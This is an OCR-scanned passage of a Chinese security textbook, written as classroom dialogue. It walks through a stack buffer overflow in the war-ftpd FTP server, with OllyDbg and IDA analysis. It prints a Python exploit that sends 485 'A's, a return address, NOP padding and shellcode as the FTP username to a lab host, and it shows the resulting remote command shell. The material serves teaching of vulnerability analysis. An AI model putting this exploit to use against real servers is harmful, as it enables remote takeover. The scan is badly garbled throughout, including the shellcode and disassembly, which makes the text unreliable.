44856 ZÜ 


п0924С36 
FlC2l1EBE 
B3ER4229 
1Я4БҒҒЕЕ 
B42ESF9SC 
HSEG&SBEF 
B1334C32 


直接 加 ShellCode 就 可 以 了 ， 构 造 


315BF424 
1CFAE2FLC 
DCST9?TE 
D221F7?67 
ETBOFCSE 
С4989787 
изСзэгБе 
g49B2CcBCc 
&GERHAF&E 
B3944B66 
4425047F 
dJ92B32LB 


1F925C36 
84229563A 
B53048632 
3C4FDCS? 
FaESGSSRÉI 
BCE&SBEF 
H3935D37 


ажа |o? EA 


有 不 能 


写 的 错误 ， 如 图 7 





ШО violation when writing to [315BF 43B] - use Shift«F7/FB/F8 to pass exception to program 
添 几 个 NOP 看 看 ， 改进 
程序 如 下 : 


造 为 : USER A*485 + RET + 32 个 Nop 十 ShellCode 


from ftplib import FTP 

ftp = FTP('192.168.3.151') 

SC = 'A'*485 +'\х12\х45\ХҒА\ХТЕ!' + '\х41'*32 

sc += "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66" 
sc +="Nx1cNxc2Nx83NxebNxfcNxe2Nxf4Nx1cNx8eNx4aNxc2NxeQ0Nx66Nx4fNx97NxbD6'' 
SC +="\X31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa" 
SC +="\X7e\XxX97\x98\xcO\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1if" 
sc +="Nx9aNx2dNx02Nx4cNx5eNxfcNxb6Nxe7Nxa7Nxd3NxcfNxelNxalNxf7Nx30Nxdb'' 
SC += ""\х1а\хзва\хаб\х95\х87\х97\х98\хс4\х67\хҒт\ха4\хбр\хба\х57\х49\4хра" 
sc +="\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb" 
sc +="\xaąa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc" 
sc +="\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\Xx95\x05\x61" 
sc +="Nx8aNxl1cNxc3Nxe0Nx66Nx4bNx94Nxb3NxefNxf9Nx2aNxc7Nx66Nx1cNxc2Nx70'"' 
SC +="\X67\x1lc\xc2\x56\x7f \xO4\x25\x44\x7f\x6c\x2b\xO5\x2f\x9a\x8b\x44" 
SC +="\X7C\X6C\XxX05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7" 
SC +="NX35Nx2eNx9dNxd3Nx54Nx1cNxX99Nx6dNx2dNx3cNx93Nx1fNxb1Nx95Nx1dNx69'' 
sc +="\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9" 
SC +="\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0" 
SC +="\X36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3" 
sc +="\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\X95\xX1f\x33\x38\x91\xb7" 
SC +="NX99Nx49NxeaNxb3Nx32Nx4DNx3dNxb5Nx46Nx95Nx05Nx88Nx25Nx51Nx86Nxe0'' 
SC +="\xef \xff\x45\xia\x57\xdc\x4f\x9c\x42\xbO\xa8\xf5\x3f\xef \x69\x67" 
SC +="\X9c\x9f\x2e\xb4\xa0\x58\xe6\xfO0\x22\x7a\x05\xa4\x42\x20\xc3\xe1" 
sc +="\xef \x60\xe6\xa8\xef \x60\xe6\xac\xef \x60\xe6\xbO\xeb\x58\xe6\xfO" 
SC +="\X32\x4c\x93\xb1i\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88" 
SC +="NX14Nxe2Nx71Nxf6Nx99Nx49Nxc6Nx1fNxb6Nx95Nx24Nx1fNx13Nx1cNxaaNx4d'!'' 
sc +="\xbf\x19\xOc\x1f\x33\x18\x4b\x23\xOc\xe3\x3d\xd6\x99\xcf\x3d\x95" 
SC +="\X66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2" 
ftp.login( sc,'ww') 


成 功利 用 ! 如 图 7 一 30. 


Microsoft Windows АР TEN 5.1.26BB1 
сс» hR3AVPH 1985-2001 Microsoft Corp. 


D: SWar-ftpd>dir 


2484-11-26 
2884-11-26 Tu PN 
2084-11-26 si (ЖЕЕ .Install.Log 
2004-ii-26 5:25 1.590 .Unlnst.inf 
199 2-B4-19 14: 41,472 Processóip.-exe 
126.464 unzip.exe 
samples 
7.348 msg.uau 
6.248 login.wvav 
1996-b6-i8 j 3J.M72 log.wau 
1997-04-24 - 72.436 ReleaseNotes.txt 
1997—H1-26 18:22 35.328 uninstall.exe 
1997-04-24 :11 388.608 war-ftpd.exe 
1997-02-13 2: 6.295 ReadMe.txt 
179 /7—H4—24 2:16 4.292.856 MVar-tftpd.hlp 
1296 18-2H Lš 1.588 wvar-ftpd.cnt 
—11-26 - B ¿lack 
2004-11-26 d 35,524 LogFile.log 
2084-11-26 dr 1.329 FtpDaemon.ini 





好 了 ， 现 在 来 分 析 分 析 漏 洞 了 ， 不 熟悉 的 地 方 开始 了 


按 老 证 讲 的 方法 ， 在 浴 出 时 记 下 保存 返回 地 址 的 ESP 值 ，ESP=00BBFD5C， 然 后 设置 写 断 
点 ， 看 是 哪个 落 数 保存 返回 地 址 在 那个 ESP 值 中 ! 


在 Ollydbg 中 ， 用 ALT 十 M 漳 出 断 点 设置 框 ， 也 可 设置 内 存 写 断 点 。 但 是 ， 设 置 后 有 无 数 的 指 
合 对 00BBFD5C 人 多 的 值 进行 了 写 操 作 。 中 断 倒是 中 断 了 很 多 次 ， 但 次 数 太 多 了 ， 根 本 不 知道 
是 哪个 范 数 的 操作 。 郁 闽 ! 调 了 半天 都 没 调 出 来 ， 还 有 其 他 课 也 布置 了 作业 。 没 办 法 ， 下 节 
课 问 老病 吧 ! 


7.3 白 盒 法 和 IDA 分 析 漏 洞 


“大 家 用 Fuzzer 分 析 warFTP 怎 么 样 啊 ?” 老 病 进入 教 宇 后 问 道 。 
“Fuzzer 太 好 用 了 1 "古风 说 道 。 


“是 啊 ，Python 也 是 ， 方 便 的 定位 出 USER 485 的 地 方 是 浴 出 点 1 ” 玉 波 说 道 。 
个 错 ， 那 漏洞 分 析 呢 ? 7E JR 问 道 JE o 
大 家 互相 望 了 望 ， 谁 都 没 调 出 来 。 


老病， 那个 方法 不 管用 啊 1 " 衬 强 鼓 足 勇气 说 道 , “被 中 断 的 地 方太 多 了 ， 不 能 在 发 生 浴 出 的 
前 方 中 断 下 来 。 而 且 我 们 又 要 考试 了 ， 没 有 太 多 的 时 间 进 行 调试 啊 !” 
“是 啊 1 ”大 家 都 很 赞同 于 强 的 说 法 。 


“好 的 ， 这 节 课 是 本 学 期 最 后 一 次 课 了 。 在 墨盒 法 分 析 失 效 的 情况 下 ， 我 们 可 以 使 用 日 合法 畏 
助 分 析 漏 洞 。 


7.3.1 日 侈 法 测试 


盒 测 试 也 称 结构 测试 或 逻辑 驱动 测试 ， 它 知 a А E 通过 测试 来 检测 产品 内 
部 动作 是 否 按照 规格 说 明 书 的 规定 正常 进行 。 它 检验 程序 中 的 每 条 通路 是 否 都 有 按 预 定 要 求 
正确 工作 。” 


小 知识 : 白 盒 法 测试 


金 法 全 面 了 解 程序 内 部 逻辑 结构 ， 对 所 有 逻辑 路 径 进 行 测试 。"“ 白 铭 ” 法 是 穷 举 路 径 测 试 。 在 
esi tt hn 吉 构 ， 从 检查 程序 的 逻辑 着 手 ， 得 出 测试 数 
据 。 日 盒 测试 的 主要 方法 有 远 辑 驱 动 、 基 路 测试 等 。 


盒 法 也 不 能 证明 ' 一 个 程序 是 ' 正 确 的 ! " 老 评 补 死 道 , “贯穿 程序 的 通路 是 天 文 效 字 ， 而 且 即 
使 每 条 路 径 都 测 斌 了， 仍然 可 能 有 和 错误。 第 一 、 穷 举 路 径 测 试 决 不 能 查 出 程序 违反 了 设计 规 
泡 ， 即 程序 本 身 是 个 错误 的 程序 。 第 二 、 穷 举 路 径 测 试 不 可 能 查 出 程序 中 因 遗 漏 路 径 而 出 
错 。 第 三 、 穷 举 路 径 测试 可 能 发 现 不 了 一 些 与 数据 相关 的 错误 。” 


“Ж Jp , Ж АЕ 是 快 说 说 漏洞 分 析 吧 | а 下 焦急 的 说 道 ЛЕ о 


7.3.2 IDA 帮 助 分 析 warFTP 漏 洞 


“好 ， 我 们 在 IDA 的 帮助 下 来 分 析 warFTP 的 漏洞 吧 І ” 


Eva X EIE), TCR 全 出 反 汇 编 代 码 ， 还 可 以 在 我 们 的 指引 
下 主动 进行 一 些 分 析 ; 而 且 可 以 写 些 脚本 IDC 来 进行 自动 分 析 。1IDA 是 白 盒 法 测试 时 必用 的 工 


EI" 


“打开 IDA 后 ， 选 择 '"openm'， 打 开 warFTPexe 程 序 就 开始 分 析 反 汇编 了 。 


“等 一 会 儿 分 析 完 毕 后 ， 在 'Function' 一 栏 可 以 直接 看 到 调用 的 了 汞 数 ， 乌 括 MFC 的 函数 名 都 可 清 
楚 的 分 析出 来 。” 


大 家 看 了 看 图 7 一 31， 果 然 如 此 1 
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[Ж] in Vet | 图 Haevien| N Names WA Functions | saings| Ë бте | Еп Frue | 
[Г 


| Mecena жітті 


| "n DA syneSocket Пп endint) 00334545 00000006 
W sn CAsuncSocket :O nReceivelint] ; 0043454 00000005 
| Ñ k: а асе ccnst " агарі І 00434582 00000006 


(033458E 00000005 
004345C UUUUOUUE5 
004345СА 00000008 
00434506 00000006 
0043450С 00000006 
|| "m" CAayncSockar-: ese ame[t Sting &urrá] . 004345E 2 00000005 
| ШЙ сато н иене me &unt&| . 002345E8 00000006 
0034345EE 00000006 


DARE 


Strings window 回回 L 
Addon: Largët Tyo 
I CasymeSocket Connectchs cwm) а n04345F4 00000005 2 E LEE C E 
гат и.а а € ппеласга Annina ar Onde 07000005 
fine 2049 aÉ 2158 "-* dena D30080 — COOOOUTO! 
| Text:Hi ih : „бага: "SOLID ... "r gaU UJUS 

„Бех: #536564 jm ds: — imp ?hcceptGAsyncsocketGRUREHARUTGPhUsocH ".* gdaaDD4300AD 020001 
.LextzHigdN5Lb4 "Hcceprid;nsuncsocketiiim HRRUTIS'HUSDCKaddihtds mz endp | ".* gasc4300B4 ООСС, 
.Ltext:üB43h56 3 | 


3 m = =m m = m = T TË: 


2359295 total тешсгу allo-ated 


Load-ng IDF modLie F: iystudyN LER ENE" ack«idz4.5*setupkpc.w32 for p^ocessor метарс. . . ОК 
Inari ng hype Tikmar- 

|éuroanalysisz s uEsys ten is initialized. 
Catabase Tor Ti le "iar — тре, exg' 15 Васев 
| E n, КОРУУ ETE S бт Ad.E5b*retup*sidc*ida.ddc ... 





"W158— F, warFTPZzEEN ARNA K FEB T 51 2 BS ; m E Ear ie uH ; 所 
ЈД...... ” 老 症 慢 慢 的 说 , “Е 2): 25, магЕТР ЩИ T 917893: X FEE REESE HH. 


“ r= Е 
A UA ERG. 


一 般 的 网 络 编程 ， 百 分 之 九 九 都 是 用 Socket 来 完成 的 。warFTP 接 收 我 们 的 字符 串 ， 应 该 束 是 


"HX! 一定 是 使 用 Socket， 用 recv 或 类 似 范 数 来 完成 的 吧 | " 衬 强 抢 看 说 道 。 


“对 1 我 们 看 看 IDA 的 'function’ 那 一 栏 ， 查 看 Socket 相 关 的 函数 。 发 现 了 MFC 的 CAsyncSocket 
:Receive 函 数 ， 那 是 MFC 封 汉 的 用 于 接收 网 络 数据 的 函数 ， 其 位 置 在 0x004345B8。” 


text:004345B8 ; public: virtual int _ thiscall CAsyncSocket::Receive(void *,int,int) 


小 知识 : МЕС 


微软 基础 类 库 ， 是 微软 对 Windows API 的 再 次 封装 ， 期 望 简化 编程 的 复杂 度 ， 提 高 软件 开发 
效率 并 减少 软件 成 本 。 


盒 法 的 辅助 分 析 后 ， 我 们 得 到 了 关键 的 启发 。 再 运行 Olydbg， 加 载 程序 ， 然 后 对 
нна 如 图 7 一 32。” 


“L IDA 一 D: YWar-Tftpd war-Ttpnil. ехе | 





File Edit Ju Search Yie Dpti от Windows Help — 


= = з = m || FYTS al- 1 [тен [mem EP |= + > | mm pese 
[E] E] 4^ | N 7n ата т & A i Fa Hü x | uú T (B Е е B&B xim t 
Ё En| |0 s--HX(S-u-vS HK ||: m E ub) AA 

| Е. А. 





Z| IDA менд | 图 HexView| N Names | “л Function | Ë Structures | En Enums | 7-7 





m 


Sirings | 


Í a —— 

E IDA View-A Alella 
text:00D43459A ; [П@ппаййб S: COLLAPSED FUNCTION CñsuncSocket::0nñccept(int). PRESS 4| 
Гехї:ййңЗщ5ай ; [йййййййб BYTES: COLLAPSED FUNCTION CñsuUncSocket::0n0ut0FBandbata(int) 
















































text:004345A0 ; [Büñ00D06 BYTES: COLLAPSED FUHCTIOUH CAsyncSocket::0nsend{int}. PRESS К 

text = ЙЙАЛАБАГ. ; [AAAAAAAA RVTFS: PAI APSFD FIINATTnH FñsunrSnrket::0nRereiue(inr)- PRFS 00434582 
Сех: 00535582 ; [HAHAAHA BYTES: COLLAPSED FUNCTION CfsuncSacket::Send(unid const *,in 00434588 
text:BüBhN3N5BB — комара 
text:BON3A5BB ; f M T H HH H ?SU B Rü uU TI H E 3727 2 2 35 3 2525353 H H OH d H H 

[oe &ock,, 00434904 
Ltext:BDA3A55BB8 ; Attributes: thunk 0434504 
сех: 053568 00434506 





test -üBN385B8 ; public: virtual int — thiscall Т t i Receive(void s*.int,int) 
Lext-ünba345B8 ?ReceiueBCAsyncSocketBGREHPAXHHBZ proc | near ; DATA XREF: .rúata-0BB377L 
























text: 00434558 ; -Frdata:0B537818]0 ... | 1 — 
text: 00494558 jmp ds: imp ?ReceivelCüsyncSocketBRUAEHPAXHHR? ; __ [Em Length 
text: 0044508 "ReceiveBDCAasyncSacketiallaEHPRXHHB? endp ".daraD0440118 00000005 
text:0043485B8 “27 Ааа. 00440120 0000000F 
text:BüBN3N5BE ; [00000005 BYTES: COLLAPSED FUHCTIUH Cñsuncsarket::Cloase(unid). PRESS К 







T 
L 
С 
Lr dara044D130 00000020 Ë 
L 
Ë 
Ë 


ех: m "." dataün440164 00000006 
text-B8O0NaASCA ; Jo d HgHg:ssuBRDUTINES32J?|[J3 3333333333333 "." dakaü0440170 0000000Е 
Lext-BBH3M85LDN La даа:00440ЛАС 00000037 






Eext:üdnts355b5 thunk 





: Attributes: 











Executing function 'main' 

Compi iing Tile НЫК; PL TIE а Раск dad. 5h5etuphidchon] cada 10C asa 
Executing nerion "OnLoad'... 

IDA is analysing the inpu- file... 

You may Ftart to esplore -he input file right mow. 

Using FLIRT signature: Microsoft wvisualc z-é,net runtime 

Using FLIRT signature: МЕС 3.1/4.0/4.2 3izbit 

Propagating type information... 

Function argument informa-ion is propagated 

The initial autoanalysis is finished. 


p б Е 3 O z _ [ 七 aE. IS тт 0. Pu Dus. mM ok е S 


“运行 全 人 A 的 超 长 字符 串 攻 击 程 序 ， i ы ДАА. Receive 其 实 还 是 调用 了 
WSOCK32 的 recv 男 数 。 我 们 跟 进去 束 可 以 看 见 如 下 代码 : 








73D4A22E > FF7424 0C PUSH DWORD PTR 55: [ESP+C ] 

73D4A232 FF7424 ОС PUSH DWORD PTR 55: [Е5Р+С] 

73D4A236 FF7424 ОС PUSH DWORD PTR 55: [ESP+C ] 

73D4A23A FF71 04 PUSH DWORD PTR 05: [ECX+4] 

/3DAA23D E8 03000000 CALL MFCA2.73D4A245 ; JMP to WSOCK32.recv 
/3DAA242 C2 ОСОО RETN OC 


“看 ， 最 后 一 个 参数 是 [ECX+4]， 值 为 00D7E93C， 是 接收 后 数据 存放 的 地 方 。 我 们 在 左下 角 
的 内 存 窗 口中 按 Ctr| 十 G， 弹 出 地 址 对 话 框 ， 输 入 00D7E93C 束 会 显示 该 地 址 的 内 容 。recv 执 
行 完 后 ， 可 以 看 到 ， 收 到 的 束 是 我 们 发 的 东 东 : User AAAAA...... 如 图 7-33。 


Enter expression to follow in Dump ЕЗ 






«I 7] TS Гъ{ 


тегт 


[D0D 7E 93с 


[am PP L 


sur «qn h Га a is а а к аа Т sy neun un 


m um Thupu Pi CU d 
Б : 


Imm 27 cU TC ET 
үл 


Cancel _ 


un 


x Tcu Ew 
Di ui sn sp 


Mn 
4 
á 
4 
4 

4 
4 
4 
4 
41 
4 
4 
4 
4 
4 
4 1 
4 
4 
4] 
á 
4 
4 
4 


"EE vg Күн Py Si uw 


i 


Dun sn 


“ 哦 | » 


iX We pk f TX ЖЕЛТ ЕН — 97, EFREN PAS КЖ! 3242822 RER, 
注意 随时 查看 各 个 参数 里 的 内 容 ， 发 现 我 们 发 送 的 字符 串 融 多 多 观察 。” 


“到 了 下 面 这 里 ， 是 在 判断 开头 的 命 分 字符 ， 这 里 是 USER 命 分， 如 图 7 一 34。” 
= ш? ° 


SE | m m TOES PTR Tm [EBP-18] ^ 
68 E4574400 | PUSH uar-ftpd, &a84467E4 ASCII "Restricted command. Permission denied." 
68 2680288088  |PUSH 226 
ES JOEEFFFF CALL war-ttpd. 00421020 
“ЕЗ 280100008 | ЈМР war-ftpd. 80423017 
> 8645 ES ОМОШ EAX. DWORD РТК SSrLEBP-181 
1C HOU ECH: DWORD PTR DS:LERET1C] 
TEST ECH, ECH 
зна = war-ftpd. BB422FFC 





R S5: [EBF-2C1 


SS: 
WORD PTR SS:0LEBP-1CJ,ECH 
СИР DWORD PTR DS: [EDX], 28 
SHORT war-ftpd. 80422F13 
DWORD РТК SSrLEBP-281,1 
HUU EAX: DWORD FTR SS: ГЕВР-141 
| bia ECX, BYTE PTR DS:LERXJ 


PUSH =. 

| БТК PTR 05: [<%HSUCET.teupper >] Быт 
HOU ЕС, DWORD PTR SS: i Wt 
MOU BYTE PTR 05: [ECX],R 

HOU ЕСЯ, DWORD FTR 53: LEBP-141 
Ley EAX, BYTE PIR DS:LECXJ 


| PUSH c 
| ааа PTRA DS:[«&MSUCRT. ізерасе >] іззрасе 


SHORT war-ft d.BB8422F?3 
ERG, DWORD РТК SS:LEBEP-14]J 
ERG, DWORD РТК 55: СЕВР-1СЈ 


ERX,S | 

E SHORT war-ftpd.00422F73 

DWORD РТК 55:ГЕВР-141 

HOU EAX, DWORD PTR SS:LEBP-141 
HOUSX ECX, BYTE PTR 05: СЕАХЈ 
PUSH ЕСХ 
CALL DWORD PTR DS:[D<&HMSUCRT.toupper)>l 
ADD ESP, 4 
(MOU ECH, DWORD PTR SS:LEBP-141 
HO, BYTE PTR DS: [ECX], AL 
ull L2 | ЕК ET E БИЕ 
























































PA A 
ri oq ГОТ" [RSÚII " RBHRRRHRRRHRRRRRRRRRRRRRRBRHRERBRRRRRRRRRRRRRRRRRRERRRRRRRRHRRRRBRRRRBHRHRFRRHRFERRRRRRRRR; 


“然后 程序 义理 后 面 的 字符 串 ， 经 过 耐心 的 跟踪 ， 在 0042E2FA : call 004044c0 时 ， 有 对 
00BBFD54 进 行 了 写 操 作 |! 即 该 萎 数 把 地 址 保存 在 00BBFD54 这 个 位 置 。 如 图 7-35。” 























ОЛА TR PCS 


OllyDbg 一 war-ftpd. exe 一 


AH AUE 





[CPU — thread 00000830, 


module war-ftpd] 



































BB42E2Cr 8B45 EC 
ana2sEPCH||. SBA MOU EAX, DWORD PTR 05: СЕЯХЈ 
aBg42E2CC|| . 3945 08 MOU DWORD PTR 55: СЕВР-281,ЕЯХ 
ae4zE2CF|| 。 85C0 TEST EAX, EAX 
0042Е201 || -r74 16 JE SHORT war-ftpd,Bd42E2E? 
aa42E2D3 8B45 ES MOU EAX, DWORD PTR 55: LEBP=18] | 
ag42E2D6||] 。 58 PUSH ЕЯ. . | | | | | W 
aa4zE2D7||. 68 CC944400 FUSH war-ftpd.8804494CC format = = "Ws" 
aed2sE2DC||. 8845 08 MOU EAX, DWORD PTR SS:LEBP-281 
aaa2zE2DF|p. 58 PU ЕК I| stream 
3042 2E2 x „ FF15 9CCF4400 CALL DWORD PTR DS:[4&MSUCRT.fprintf»1 |Ь#ргїп*# 
> C745 FC Doaeall nou DWORD PTR EE pou ü 
- U EAX, OWORD P : [EBP-18] 
- MOU ECX, DWORD PTR 08: [44R5881 | ак minc кч яң 
= Hrg 
Ай42Е2 a ES C161FDFF | CALL ыаг-#®рда.йй4й44С@ Loic ecpa. 004044c0 
aB42EPFF||. 8B45 E4 MOU EAX, DWORD PTR 55: LEBPF-1C] 
0042Е302 ||, 5680 CS000000 | MOU EAX, DWORD PTR 05: СЕАХ+С8Ј 
0042Е 3 . 85C0_ TEST EAX, EAX 
BE E erą 15 JE SHORT war-ftpd.Ba42E321 
0042ЕЗӨС |. SB4D ES MOU ECX,DUORD PTR SS:LEBF-18] 
. 8550 20 MOU EDX, DWORD PTR 05: ГЕЯХ+201 
А P. EN RI uh f Esran e 
š | Wwraram = 
а = S8818888 AES 198 || Message = LB RDDSTRIHG 
. | | E hund 
A Ə А H ostMessagi Рот Мезе зое 
ed 2E3 3d 65004400 | CALL DWORD PTR DS: D E Ро= Ме | Posthe H 
ae42ES321|| > 68 C9944400 PUSH war-ftpd. #044 Irs2 = "Wm 
0042Е326 ||. БАЯ O8 PLISH ü | El = NULL 
0042Е328|]. FF15 BSCF4488|| CALL DWORD PTR DS: [4&HMSUCRT. strtok?] strtok 
Ba42ES2E||. 83C4 ADD ESF, & 
0042Е3351 || - 8945 ES HOU DWORD РТК 55: СЕВР-181,ЕЯХ 
па42Е334 | . 35C0 TEST ЕН 
айагЕззеЄ|[ ,^7r5 SB | SHORT war-ftpd 
0042Е3328 |] > 8845 EC HOY EAX, DWORD PTR 55: LEBP-14] 
ag42zESSB||. 8B808 | AX. DWORD PTR DOS: LEAN] 
0042Е330 || 。 85С@ TEST EA», EA» 
Ba42ESSF|| 74 13 JE SHORT war-ftpd.GB842E354 | 
B042E3 M41 . 58 PUSH EAX If stream 
- FF1S  EoLr4400 CALL DWORD PTR 05: [<&MSUCRT. felose>] | fclose 
ANT ! 


а ай ба ай S53 4B 43 AA| ..... YKI 





"B; ! 但 00BBFD54 和 00BBFD5C 不 是 同一 个 地 址 啊 ! " 吝 风 一 脸 疑 问 的 表情 。 
“莫非 是 ret n ? " 宇 强 说 道 
“呵呵 | 我 们 按 F8 跟 进去 看 看 1! ” 


“好 ， 一 下 子 就 看 见 有 一 个 sprinft 函 数 ! 如 图 7-36。 





363 













OllyDbg — war-ftpd. exe 一 


File Debug Plugins 
ш 44| X Pt ө: 
















Üptions Window 


:| Jj =: 


View 


Help 











Hadda CAl rs | ESF, 

00404466! š EH PUSH ESI 

aadad44C7ll , S? PUSH EDI 

B64644C8|| . SBF1 МО) ESI,ECX 

ag4g44Cn| |. 6A ИЙ FUSH а 

ййай4аасс!{ , БЯ ÖZ PUSH 2 

па4044СЕ![ . За BEGA FUSH BBB 

jadaga f a | PUSH 41F 

0940440811 . ES dg eia CALL 4JHMP.&HFC42,. #5502 > 
пва4р44001[ . СМР 

004044Е0 |. Sors HOU EDI,ERX 

йй4ай44Е2!{ .-7E 83 T SHORT uar-ftpd.8aBdB44E? 
п04044Е4 | B3EF Be | 

8a48044E7 SB9424 148280686 HOU ER, DWORD PTR 55: LESP*2141 
ipnapadEE | вла |а | LER EC; DWORD PTR SS: LESP-*18] 





58 PUSH EAS 

E Lano4400 EE pub - 90944060 

EF15 C4CF4400 CALL DWORD PTR DS:L«&HSUCRT. sprintf?J 
8D4C24 14 LEA EC, DWORD PTR SS:LESP*141 

805424 18 LEA EDX, DWORD PTR SSr LESP+18] 













PIP 3F_F | 
+ ЙЕ Их | 









> 
айайавБйт?! |. E ac ADO ESP, BC 
айайа4ывйц|{ . PUSH ECX 
па4045а6 10 a el PUSH EDX 
па4045ас! . = вра PUSH aBa 
ag4845111l . МО) ECX,ESI 
004804515101 . 68- ire4aooo PUSH 41F 
agp4p45158]|]. ЕВ 3B3E5FDB2BB CALL &JHP. &MF C42. #5802 > 
Gae4pB451DI|] 。 6а дд PUSH à 
aBaB451FII . SGBCE МО) ЕСЖ, ESI 
0040452111. БЯ e PUSH а 
004045251]. 685 Bla88888 PUSH GE1 
Bp4p452s| |. 68 1Ға4ВаВа PUSH 41F 
aGa4G452DI| . ЕВ 20FDG266 CALL <ЈМР. АМРС42. #5800 > 
па4а45321 „ SD4C24 18 LEA EC, DWORD FTR SS: ГЕ5Р+187 
aamdmd5Eselp. 51 PUSH ECX 
0848453 |. R BB 
paar . 8 CZAAAAAA PUSH AC2 
B a BCE HOU ECH, ESI 
3 . 68 1Ға4аваа PUSH 4 





BBF Dead CALL «HP. &HFC42. 85882» 
aa PUSH à 


LUOU ЕГУ 
(HSUCRT.sprintft) 
Address |Нен dump —— | RSCII | 
[К ТЕ | Аааа! £dd AA AAGA AA СЧ dE d- AA Lk 


“我 们 边 单 步 运行 ， 边 查看 它 的 参数 。 


“站 先 PUSH EAX， 这 个 EAX 为 如 下 :” 


"[C 2004 11 26 22:42] 00001 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


“就 是 日 期 时 间 加 上 我 们 输入 的 超 长 字符 串 。 
“AE, PUSH war-ftpd.004406C0, 
“最 后 PUSH ECX, CALL <&MSVCRT.sprintf>, ” 
“我 们 来 计算 一 下 ，ecx 二 0x00BBFB54 ; 而 保存 返 


“HHA, OxOOBBFD54 —OxOOBBFB54 = 0x200 — 512, 


[CPU — thread 00000830, 


: 


“而 前 面 [C 2004 11 26 22:42] 00001 AAA... 有 28 个 字符 ， 


是 这 样 1” 


“继续 跟踪 ， 


войп1е war-ftpd] 





fc mat = 


sprintf 


这 里 是 %s， 一 个 标准 的 字符 串 拷贝 。” 


反 回 地 址 在 ESP = 二 0x00BBFD54 中 。 


所 以 填充 A 为 是 512-27 二 485。 果 然 


到 函数 返回 的 时 候 ， 果 然 和 宇 强 同 学 说 的 一 样 ， 是 RETN 4， 如 图 7-37。 


ds? = үм 11 26 22:42] 888801 AAAAAAAAAA 


ОЛ zx HX G ДЕ 






































God4e6d4SRF| > 397C24 ӨЗ CHP DWORD РТК 55: ГЕ5Р+81,ЕПЇ 
па4045ЕЭ3 "Pë 18 JBE SHORT war-ftpd. Ba4845CD 
пй4ӣ4565 807С24 18 LEA EDI,DWORD PTR SS: ГЕ5Р+1ӨЈ 
an4da4spo Ba FFFFFFFF MOU ECX,-1 

ag4a4s5EE ZBC SUB EAX, EAX 

pBa4B845C0Ə8 I . F2: ЯЕ КЕРМЕ SCAS BYTE PTR ES:LEDI] 
ОЁ4045с2 |1. F?Di HOT ECX 

ae4e45Cc4|lf . 49 DEC ECX 

Bagda45Cc5l9] . 814C24 BC ADO DWORD PTR 55: [ESP+C], ECH 
па4а45Сэ E аї4Сг&4 B2 HDD DWORD РТЕ SS: [ESP+8], ECA 
004045С0 | > 8B4424 BƏ HOU EAX. OWORD PTR SS: [ESP+S] 
464501] 。 S8B4C24 ӨС MOU ECX,DWORD PTR SS: [ESP+C] 
па404505 11. 5B FUSH ER 

па4за45о6 |. 51 PUSH ЕСУ 

ЙЙ4Ё4507 f. 68 Bl PUSH BB1 

ago4g45DC|Il 。 SBCE MOU ECX,ESI 

aB4B45DE||. 68 iFe4eeea  |PUSH 41Р 

ВВ4а45ЕЗ | , ES БЯҒСа2ӢЙ CALL <ЈМР. МЕС42. #58002 > 
йй4й4БЕё Е БЯ ma ШН а 

ӨЙй4Й4БЕН|. SECE MOU ECX,ESI 

BB4B45EC|] . БА Bü PUSH B 

BB4B4SEE II . 68 B?BOBODO PUSH BB? 

B64845F311 。 68 1FB8B4BBDBB FUSH 41F 

aaB4e845F8ll. ЕЗ SSFC06288 CALL €.HP.&HFC4d2, #5802) 
BB4B4SFD II 。 SF FOF EDI 

B84845FE |. SE POP ESI 

(Qag4a8B45FFIE. 51С4 BpS082689800| ADD ESF, 288 

Кыр А. C panpa RETH 4 

p 484608 LC INT3 

00404609 СС INTS 

aa4a46nn CC INT 

айай4&йБ CC INT3 

ВВ40460С CC IHTS 

00404600 CC INTZ 

ПЕ4В46ӢЕ CC INT 

айай4&йЕ CC INT3 

BD4B84618] . БЯ BË PUSH 6 

9484612] . ES SBFC082080 CALL <JHP.&HFC 262155 
8084084617] . C3 RETH 

004046185 CC INT3 

айайаеё 19 СС IHT3 

aga4n46 1H CC IHTS 

ИЙ4Й4Ё ЇВ ГГ. TINTA 
“我 们 说 过 RET 4— POP EIP, ADD ESP，4。 现 在 ESP 二 00BBFD54， 对 应 的 值 为 
41414141， 所 以 返回 后 ， 系 统 会 执行 0X41414141 的 地 方 ， 如 图 7-38。 
Address | Нен dump 

ӨЙБВЕПЬ4 | 4 4 | 4] 4 

BAaBBFDSLC| « 4] ， 

aanBBFDea4 1 "2 

AABEFDEC | ec 

aapBBFD?4 eE 2 

aagBFDr?c г2 

aaBBFDS4 | BD 

B8BEFDSC г 0G 

aegBFDea4 acest 

aapEFnDec 98 

ЙЙБЕБЕПНАа ES 

GeBEFDRLC ! Ba 

BëEEFDB4 ec 2 

AABBEF DBC Ha 

aBBBFDca а ama 

BaaBBFDCC 3 ЭН "8; SEE... 

AHBBFOD4 68 F oh a 

BBB F DDC | Ai ) йй Ё RM E 

BƏBBFDE4| [ ra f£. 

@@ВВЕПЕС | : an | f$C. .. .. 

AHBBFOF 4 =F 

BƏBBFDFC| 80 3 13 B 
“最 后 看 看 为 什么 RET 4 返回 后 ，ESP 会 成 为 00BBFD5C。 
